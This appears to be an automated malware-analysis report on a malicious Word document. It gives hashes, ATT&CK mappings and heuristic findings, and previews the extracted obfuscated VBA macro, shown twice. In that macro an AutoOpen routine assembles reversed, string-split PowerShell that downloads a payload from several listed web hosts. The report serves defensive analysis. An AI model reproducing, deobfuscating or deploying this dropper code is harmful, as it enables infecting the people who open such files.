Office (OLE) malware analysis — malicious · 466683e66aa128c3

MALICIOUS

Office (OLE)

152.5 KB Created: 2018-05-14 11:10:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: d9fd4f5b1385f9a971d53bc776f407c4 SHA-1: fd839722d2a6f78e76149a091fab423940b2acf4 SHA-256: 466683e66aa128c3a6485a7b60eddff522c8c7da14e42a6643fb194611291455

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_AUTOOPEN. The critical OLE_VBA_SHELL firing suggests the macro attempts to execute external code. The SE_PASSWORD_ARCHIVE_LURE heuristic indicates the document likely instructs the user to open a password-protected archive, a common tactic to bypass gateway security. The Autoopen macro is present and likely initiates the malicious execution chain.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6543332-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6543332-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 123835 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	123835 bytes
SHA-256: `bee0ac40a5e438f2d7f1016d0a647081b9a84268f2fc0a9a1b4fa42a24566b86`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mPkTWCQHoBKZB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub JlAnis(TwaGZB) piMcJN = YLSlQ + Sgn(91093 - bFnoBD - jJBzX + Fix(6584)) - 65506 - CDbl(92662) JVvsk = BtOii ahBSzG = qmSXzT VKclK = 69863 End Sub Sub EIQVDt(DtaTZ) Fbzhaw = FUrzzZ + Sgn(52783 - rRcXuI - YlzuN + Fix(57405)) - 75045 - CDbl(86423) EYjDtK = LNuXkR YiSWM = zvfakC kjjMS = 52117 tYpYwj = QKzll + Sgn(14126 - YQvHa - uIsJT + Fix(82131)) - 92913 - CDbl(21708) dhEJSY = otYjGh fpwvuL = oErKF jfFHkK = 70876 RjcpuZ = BjtKNX + Sgn(24722 - UvBAP - dMwMnS + Fix(17274)) - 78280 - CDbl(32373) vwEOIW = AlonV ArNTLk = iKVro dcHGS = 24193 End Sub Sub zOQSw(woBOa) HOwVZ = zEENkb + Sgn(24488 - psdsi - aDAlb + Fix(90260)) - 39562 - CDbl(1540) Xhvuqj = fHhHV NkipG = VFKIk aEOMt = 59076 wShfoj = skNWL + Sgn(44741 - SpPHl - vfjMZL + Fix(80939)) - 30515 - CDbl(55005) SNCcYq = FpIjhk owNCHO = FIpjRl FdqGP = 90785 End Sub Sub Autoopen() On Error Resume Next JIuccI = ScFOu + Sgn(79874 - cwnIN - MEMsHE + Fix(22831)) - 99687 - CDbl(22178) dRpvi = SZfGqm kVWvwc = DwCFiE CVXwJG = 20549 uKIzvuWwhpD (wEttoj + iQfXBvCI + cHzZY) WkJPWj = iPkMZ + Sgn(85819 - EHJjf - JYSBC + Fix(77324)) - 97803 - CDbl(79333) uFIjT = kOhmaw hUhTwQ = VwTuD zSHMi = 64508 End Sub Sub IUiDt(kTsbt) ZMqwU = sifAwm + Sgn(28570 - AhSHUE - WoNpda + Fix(44018)) - 62660 - CDbl(80199) WZodGH = mdqzt YsoQY = BlGpM XdIqJ = 40932 pYZMa = tazUrN + Sgn(87898 - fpwoJw - oqQjcb + Fix(67262)) - 56800 - CDbl(22279) UVzDjw = ORfbDQ cSZso = BzXXB JczYKz = 73806 WswZw = RarSCk + Sgn(50866 - HJBqp - uUwaBC + Fix(80062)) - 6125 - CDbl(32070) UiRrtk = Awwub EURHI = oWTHm BtVXtA = 26617 End Sub Sub wwYSi(XmAur) SNuFk = jicWAW + Sgn(59277 - rqAdC - jSJFww + Fix(46865)) - 3521 - CDbl(95233) VZQhM = zQnwTf bzBoVP = mXstYz oIlWi = 70422 End Sub Attribute VB_Name = "BbFzADqkpEd" Sub lhIuK(mQPzj) JMkLH = bpvGa + Sgn(40951 - qUMqCh - QXOWfO + Fix(51431)) - 38622 - CDbl(85605) LDvio = Sicoco iHnwT = aZNQsH zOftbH = 93500 End Sub Function iQfXBvCI() On Error Resume Next vXaNCj = LZtLbQ + Sgn(70167 - sPGlS - znCbCq + Fix(9279)) - 98457 - CDbl(67472) Vrfjk = lRBjN WhfVNz = iUVifz XlApoM = 81326 NzoNci = XHuIa + Sgn(93738 - LLsrz - LVvRt + Fix(91494)) - 5209 - CDbl(74700) NSQmvR = UziqB lnccFA = LdqWW sBWUjf = 28159 CREsShnpEN = uJOXwd("zOd9Q ))69]raHC[,'G5o' ecAlper- 29]raHC[,)87]raHC[+701]raoc", 62186 + 3 - 62186, 62186 + 53 - 62186) tcroBj = qsNJR + Sgn(26485 - IpQqBi - kbuPNY + Fix(11861)) - 96405 - CDbl(58991) KnVrLk = DREVld EUJth = qdkrJ zYnKz = 84760 wQozC = sDXIWB + Sgn(40934 - XBjEw - PHJKQh + Fix(30984)) - 84329 - CDbl(78644) SziivT = qGdjJm vLBQvk = jTmBrH jVXAOo = 80226 umCtXoj = uJOXwd("ML, CDSH3a;)X'+'6y@X'+'6y(tilpS.X6y/B8V'+'VVJ'+'G/moc.ovoted'+'//:ptth'+'@/HrEUR'+'/moc.'+'eir'+'tsudni-'+'eira//:pt'+'th@/YY3n'+'FS/ed'+'.esie'+'r-nrey'+'ab//'+':ptth@/4E'+'hGM/nijp", 26860 + 5 - 26860, 26860 + 175 - 26860) WrQDP = zUPFUi + Sgn(29153 - jzwEq - jsdELI + Fix(18797)) - 71447 - CDbl(11571) vwoYoK = rVAiw vXcOb = YEKzDr OMsGiM = 28396 wfwWYd = iJtlX + Sgn(99691 - IqCQF - mLhhN + Fix(3604)) - 85527 - CDbl(27579) IiRLdk = LqbmY QaTnI = BPQIc tkzPIW = 71102 EZMDuTT = uJOXwd("bSited.nesier-anit'+'a//'+':pt'+'th@/Vm'+'TY'+'M3N/'+'zib.mar'+'gtpa//'+':'+'p'+'tth X6y = XCDAH'+'3'+'a;)331282 ,00'+'001'+'('+'txen.d'+'sada'+'s'+'nH3a '+'= BSNH3a;tneilCSP", 63779 + 3 - 63779, 63779 + 168 - 63779) mBKTLV = IiMpSi + Sgn(26585 - GOathM - rapQkz + Fix(4963)) - 93420 - CDbl(64183) CimOQ = bmfslD KRfoq = idDhJ kivlf = 12249 ziMjB = kVjsQ + Sgn(84936 - bNFhot - PAhbG + Fix(13115)) - 27158 - CDbl(27021) RiiQCU = mrKXi VoYXwJ = vVWOw zAkduH = 42755 rbtTjqasHa = uJOXwd("U7Z%@beW'+'.t'+'eN.m'+'ets'+'yS )X6'+'yt'+'c'+'ejbo-X'+'6y+'+'X'+'6yw'+'X6y+X6yenX'+'6y(. = UYYH3a;m'+'odnar )'+'X'+'6ytX6'+'y'+'+X6kUB", 65407 + 4 - 65407, ... (truncated)

SHA-256: bee0ac40a5e438f2d7f1016d0a647081b9a84268f2fc0a9a1b4fa42a24566b86

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mPkTWCQHoBKZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JlAnis(TwaGZB)
piMcJN = YLSlQ + Sgn(91093 - bFnoBD - jJBzX + Fix(6584)) - 65506 - CDbl(92662)
JVvsk = BtOii
ahBSzG = qmSXzT
VKclK = 69863
End Sub
Sub EIQVDt(DtaTZ)
Fbzhaw = FUrzzZ + Sgn(52783 - rRcXuI - YlzuN + Fix(57405)) - 75045 - CDbl(86423)
EYjDtK = LNuXkR
YiSWM = zvfakC
kjjMS = 52117
tYpYwj = QKzll + Sgn(14126 - YQvHa - uIsJT + Fix(82131)) - 92913 - CDbl(21708)
dhEJSY = otYjGh
fpwvuL = oErKF
jfFHkK = 70876
RjcpuZ = BjtKNX + Sgn(24722 - UvBAP - dMwMnS + Fix(17274)) - 78280 - CDbl(32373)
vwEOIW = AlonV
ArNTLk = iKVro
dcHGS = 24193
End Sub
Sub zOQSw(woBOa)
HOwVZ = zEENkb + Sgn(24488 - psdsi - aDAlb + Fix(90260)) - 39562 - CDbl(1540)
Xhvuqj = fHhHV
NkipG = VFKIk
aEOMt = 59076
wShfoj = skNWL + Sgn(44741 - SpPHl - vfjMZL + Fix(80939)) - 30515 - CDbl(55005)
SNCcYq = FpIjhk
owNCHO = FIpjRl
FdqGP = 90785
End Sub
Sub Autoopen()
On Error Resume Next
JIuccI = ScFOu + Sgn(79874 - cwnIN - MEMsHE + Fix(22831)) - 99687 - CDbl(22178)
dRpvi = SZfGqm
kVWvwc = DwCFiE
CVXwJG = 20549
uKIzvuWwhpD (wEttoj + iQfXBvCI + cHzZY)
WkJPWj = iPkMZ + Sgn(85819 - EHJjf - JYSBC + Fix(77324)) - 97803 - CDbl(79333)
uFIjT = kOhmaw
hUhTwQ = VwTuD
zSHMi = 64508
End Sub
Sub IUiDt(kTsbt)
ZMqwU = sifAwm + Sgn(28570 - AhSHUE - WoNpda + Fix(44018)) - 62660 - CDbl(80199)
WZodGH = mdqzt
YsoQY = BlGpM
XdIqJ = 40932
pYZMa = tazUrN + Sgn(87898 - fpwoJw - oqQjcb + Fix(67262)) - 56800 - CDbl(22279)
UVzDjw = ORfbDQ
cSZso = BzXXB
JczYKz = 73806
WswZw = RarSCk + Sgn(50866 - HJBqp - uUwaBC + Fix(80062)) - 6125 - CDbl(32070)
UiRrtk = Awwub
EURHI = oWTHm
BtVXtA = 26617
End Sub
Sub wwYSi(XmAur)
SNuFk = jicWAW + Sgn(59277 - rqAdC - jSJFww + Fix(46865)) - 3521 - CDbl(95233)
VZQhM = zQnwTf
bzBoVP = mXstYz
oIlWi = 70422
End Sub

Attribute VB_Name = "BbFzADqkpEd"
Sub lhIuK(mQPzj)
JMkLH = bpvGa + Sgn(40951 - qUMqCh - QXOWfO + Fix(51431)) - 38622 - CDbl(85605)
LDvio = Sicoco
iHnwT = aZNQsH
zOftbH = 93500
End Sub
Function iQfXBvCI()
On Error Resume Next
vXaNCj = LZtLbQ + Sgn(70167 - sPGlS - znCbCq + Fix(9279)) - 98457 - CDbl(67472)
Vrfjk = lRBjN
WhfVNz = iUVifz
XlApoM = 81326
NzoNci = XHuIa + Sgn(93738 - LLsrz - LVvRt + Fix(91494)) - 5209 - CDbl(74700)
NSQmvR = UziqB
lnccFA = LdqWW
sBWUjf = 28159
CREsShnpEN = uJOXwd("zOd9Q ))69]raHC[,'G5o' ecAlper-  29]raHC[,)87]raHC[+701]raoc", 62186 + 3 - 62186, 62186 + 53 - 62186)
tcroBj = qsNJR + Sgn(26485 - IpQqBi - kbuPNY + Fix(11861)) - 96405 - CDbl(58991)
KnVrLk = DREVld
EUJth = qdkrJ
zYnKz = 84760
wQozC = sDXIWB + Sgn(40934 - XBjEw - PHJKQh + Fix(30984)) - 84329 - CDbl(78644)
SziivT = qGdjJm
vLBQvk = jTmBrH
jVXAOo = 80226
umCtXoj = uJOXwd("ML, CDSH3a;)X'+'6y@X'+'6y(tilpS.X6y/B8V'+'VVJ'+'G/moc.ovoted'+'//:ptth'+'@/HrEUR'+'/moc.'+'eir'+'tsudni-'+'eira//:pt'+'th@/YY3n'+'FS/ed'+'.esie'+'r-nrey'+'ab//'+':ptth@/4E'+'hGM/nijp", 26860 + 5 - 26860, 26860 + 175 - 26860)
WrQDP = zUPFUi + Sgn(29153 - jzwEq - jsdELI + Fix(18797)) - 71447 - CDbl(11571)
vwoYoK = rVAiw
vXcOb = YEKzDr
OMsGiM = 28396
wfwWYd = iJtlX + Sgn(99691 - IqCQF - mLhhN + Fix(3604)) - 85527 - CDbl(27579)
IiRLdk = LqbmY
QaTnI = BPQIc
tkzPIW = 71102
EZMDuTT = uJOXwd("bSited.nesier-anit'+'a//'+':pt'+'th@/Vm'+'TY'+'M3N/'+'zib.mar'+'gtpa//'+':'+'p'+'tth X6y = XCDAH'+'3'+'a;)331282 ,00'+'001'+'('+'txen.d'+'sada'+'s'+'nH3a '+'= BSNH3a;tneilCSP", 63779 + 3 - 63779, 63779 + 168 - 63779)
mBKTLV = IiMpSi + Sgn(26585 - GOathM - rapQkz + Fix(4963)) - 93420 - CDbl(64183)
CimOQ = bmfslD
KRfoq = idDhJ
kivlf = 12249
ziMjB = kVjsQ + Sgn(84936 - bNFhot - PAhbG + Fix(13115)) - 27158 - CDbl(27021)
RiiQCU = mrKXi
VoYXwJ = vVWOw
zAkduH = 42755
rbtTjqasHa = uJOXwd("U7Z%@beW'+'.t'+'eN.m'+'ets'+'yS )X6'+'yt'+'c'+'ejbo-X'+'6y+'+'X'+'6yw'+'X6y+X6yenX'+'6y(. = UYYH3a;m'+'odnar )'+'X'+'6ytX6'+'y'+'+X6kUB", 65407 + 4 - 65407, 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.